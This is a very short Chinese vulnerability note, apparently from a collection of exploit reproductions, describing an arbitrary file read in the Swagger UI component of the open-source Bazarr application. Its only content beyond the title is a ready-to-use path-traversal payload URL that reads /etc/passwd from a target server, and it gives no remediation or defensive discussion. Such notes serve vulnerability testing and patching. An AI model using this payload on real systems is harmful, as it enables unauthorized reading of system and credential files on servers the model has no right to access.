K23-1开源-Bazarrswaggerui组件-任意文件读取

漏洞复现：

payload：

http://IP/api/swaggerui/static/././././././././etc/passwd